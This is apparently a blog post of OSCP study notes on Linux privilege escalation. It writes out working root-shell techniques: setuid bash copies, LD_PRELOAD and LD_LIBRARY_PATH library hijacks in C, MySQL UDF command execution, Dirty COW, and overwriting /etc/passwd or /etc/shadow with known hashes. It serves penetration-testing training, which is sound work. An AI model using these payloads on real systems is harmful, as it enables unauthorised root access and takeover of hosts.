Certification

OSCP notes dump: #PRIVESC-LIN

Philipp Fragstein

Mar 8, 2023 • 8 min read

After the initial compromise of a Linux host the escalation of privileges is necessary to get further access or pivot through the network. I made a lot of notes regarding this larger chapter of the OSCP certification.

This useful minmap from C0nd4 should be the entrypoint:

quick notes

- spend some time and read over the results of your enumeration.
- if Linux Smart Enumeration level 0 or 1 finds something interesting, make a note of it.
- avoid rabbit holes by creating a checklist of things you need for the privilege escalation method to work.
- have a quick look around for files in your user’s home directory and other common locations (e.g./var/backup, /var/logs).
- if your user has a history file, read it, it may have important information like commands or even passwords.
- try things that don’t have many steps first, e.g. Sudo, CronJobs, SUID files.
- have a good look at root processes, enumerate their versions and search for exploits.
- check for internal ports that you might be able to forward to your attacking machine.
- re-read your full enumeration dumps and highlight anything that seems odd.
- “unusual” filesystem configured (on Linux, anything that isn’t ext, swap, or tmpfs), or even a username.
- at this stage you can also start to think about Kernel Exploits.

SUID rootbash

cp /bin/bash /tmp/rootbash && chmod 6755 /tmp/rootbash
bash -p 

# there may be instances where some root process executes another process which you can control. In these cases, the following C code,once compiled, will spawn a Bash shell running as root:
int main() {
setuid(0);
system("/bin/bash -p");
}
#compile using:
$ gcc -o <name> <filename.c>

kernel exploitation

1. Enumerate the kernel version:
$ uname -a
Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_6
4 GNU/Linux

2. use searchsploit to find matching exploits:
searchsploit linux kernel 2.6.32 priv esc

3. we can try and adjust our search to be less specific with the kernel version, but more specific with the distribution:
searchsploit linux kernel 2.6 priv esc debian

4. install Linux Exploit Suggester 2 (https://github.com/jondonas/linux-exploitsuggester-2) and run the tool against the original kernel version:
./linux-exploit-suggester-2.pl –k 2.6.32
- this reveals a popular kernel exploit (Dirty COW).

5. there are a number of Dirty COW exploits, all of which use different methods to obtain a root shell. The following version seems to work best on the practice VM: https://gist.github.com/KrE80r/42f8629577db95782d5e4f609f437a54

6. download and compile it using the instructions in the file:
gcc -pthread c0w.c -o c0w

7. run the exploit:
./c0w

8. once the exploit is complete, simply execute the /usr/bin/passwd binary to get a root shell:
/usr/bin/passwd
root@debian:/home/user# id
uid=0(root) gid=1000(user) groups=0(root) ...

MySQL UDF

1. enumerate the processes running as root:
$ ps aux | grep "^root”
...
root 6933 0.0 4.9 165472 24376 pts/0 Sl 02:13 0:02 /usr
/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root ...
Note that the mysqld process is running as root.

2. enumerate the version of mysqld:
mysqld --version mysqld Ver 5.1.73-1+deb6u1 for debian-linux-gnu on x86_64 ((Debian))

3. mysql has the ability to install User Defined Functions (UDF) which run via shared objects.

4. follow the instructions in this exploit to compile and install a UDF which executes system commands:
https://www.exploit-db.com/exploits/1518
Note: some commands may require slight modification.

5. once the UDF is installed, run the following command in the MySQL shell:
mysql> select do_system('cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash');

6. drop back to our regular shell, and run /tmp/rootbash for a root shell:
$ /tmp/rootbash -p
rootbash-4.1# id
uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root
),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(u
ser)

weak file permissions

- certain system files can be taken advantage of to perform privilege escalation if the permissions on them are too weak.
- If a system file has confidential information we can read, it may be used to gain access to the root account.
- If a system file can be written to, we may be able to modify the way the operating system works and gain root access that way.

/ETC/SHADOW
- the /etc/shadow file contains user password hashes, and by default is not readable by any user except for root.
- If we are able to read the contents of the /etc/shadow file, we might be able to crack the root user’s password hash.
- If we are able to modify the /etc/shadow file, we can replace the root user’s password hash with one we know.

/ETC/PASSWD
- the /etc/passwd historically contained user password hashes.
For backwards compatibility, if the second field of a user row in /etc/passwd
contains a password hash, it takes precedent over the hash in /etc/shadow.
If we can write to /etc/passwd, we can easily enter a known password hash for
the root user, and then use the su command to switch to the root user.
Alternatively, if we can only append to the file, we can create a new user but
assign them the root user ID (0). This works because Linux allows multiple entries
for the same user ID, as long as the usernames are different.

BACKUPS
- even if a machine has correct permissions on important or sensitive files, a user may have created insecure backups of these files.
- it is always worth exploring the file system looking for readable backup files. 
- some common places include user home directories, the / (root) directory, /tmp, and /var/backups.

/etc/shadow

1. check the permissions of the /etc/shadow file:
ls -l /etc/shadow
-rw-r—rw- 1 root shadow 810 May 13 2017 /etc/shadow
Note that it is world writable.

2. copy / save the contents of /etc/shadow so we can restore it later.

3. generate a new SHA-512 password hash:
mkpasswd -m sha-512 newpassword $6$DoH8o2GhA$5A7DHvXfkIQO1Zctb834b.SWIim2NBNys9D9h5wUvYK3IOGdxoOlL9VEWwO/okK3vi1IdVaO9.xt4IQMY4OUj/

4. edit the /etc/shadow and replace the root user’s password hash with the one we generated.
root:$6$DoH8o2GhA$5A7DHvXfkIQO1Zctb834b.SWIim2NBNys9D9h5wUvYK3IOGdxoOlL9VEWwO/okK3vi1IdVaO9.xt4IQMY4OUj/:17298:0:99999:7:::

5. use the su command to switch to the root user, entering the new password when prompted:
$ su
Password:
root@debian:/# id
uid=0(root) gid=0(root) groups=0(root)

/etc/passwd

- the root account in /etc/passwd is usually configured like this:
root:x:0:0:root:/root:/bin/bash
- the “x” in the second field instructs Linux to look for the password hash in the /etc/shadow file.
- in some versions of Linux, it is possible to simply delete the “x”, which Linux interprets as the user having no password:
root::0:0:root:/root:/bin/bash

1. check the permissions of the /etc/passwd file:
ls -l /etc/passwd
-rw-r--rw- 1 root root 951 May 13 2017 /etc/passwd
Note that it is world writable.

2. generate a password hash for the password “password” using openssl:
openssl passwd "password"
L9yLGxncbOROc

3. edit the /etc/passwd file and enter the hash in the second field of the root user row:
root:L9yLGxncbOROc:0:0:root:/root:/bin/bash

4. use the su command to switch to the root user:
su
Password:
id
uid=0(root) gid=0(root) groups=0(root)

5. alternatively, append a new row to /etc/passwd to create an alternate root user (e.g. newroot):
newroot:L9yLGxncbOROc:0:0:root:/root:/bin/bash

6. use the su command to switch to the newroot user:
su newroot
Password:
id
uid=0(root) gid=0(root) groups=0(root)

environment variables

LD_PRELOAD
1. list the programs your user is allowed to run via
sudo -l

Matching Defaults entries for user on this host:
env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
...

Note that the env_keep option includes the LD_PRELOAD environment variable.

2. create a file (preload.c) with the following contents:
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setresuid(0,0,0);
system("/bin/bash -p");
}

3. compile preload.c to preload.so:
gcc -fPIC -shared -nostartfiles -o /tmp/preload.so preload.c

4. run any allowed program using sudo, while setting the LD_PRELOAD environment variable to the full path of the preload.so file:
sudo LD_PRELOAD=/tmp/preload.so apache2
id
uid=0(root) gid=0(root) groups=0(root)


LD_LIBRARY_PATH
1. run ldd against the apache2 program file:
ldd /usr/sbin/apache2
linux-vdso.so.1 => (0x00007fff063ff000)
...
libcrypt.so.1 => /lib/libcrypt.so.1 (0x00007f7d4199d000)
libdl.so.2 => /lib/libdl.so.2 (0x00007f7d41798000)
libexpat.so.1 => /usr/lib/libexpat.so.1 (0x00007f7d41570000)
/lib64/ld-linux-x86-64.so.2 (0x00007f7d42e84000)
Hijacking shared objects using this method is hit or miss. Choose one from the list and try it (libcrypt.so.1 seems to work well).

2. create a file (library_path.c) with the following contents:
#include <stdio.h>
#include <stdlib.h>
static void hijack() __attribute__((constructor));
void hijack() {
unsetenv("LD_LIBRARY_PATH");
setresuid(0,0,0);
system("/bin/bash -p");
}

3. compile library_path.c into libcrypt.so.1:
gcc -o libcrypt.so.1 -shared -fPIC library_path.c

4. run apache2 using sudo, while setting the LD_LIBRARY_PATH environment variable to the current path (where we compiled library_path.c):
sudo LD_LIBRARY_PATH=. apache2
id
uid=0(root) gid=0(root) groups=0(root)

find suid/guid files

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

link collection

GTFOBins

Basic Linux Privilege Escalation - g0tmi1k

Before starting, I would like to point out - I’m no expert. As far as I know, there isn’t a

g0tmi1kg0tmi1k

unix-privesc-check | pentestmonkey

pentestmonkey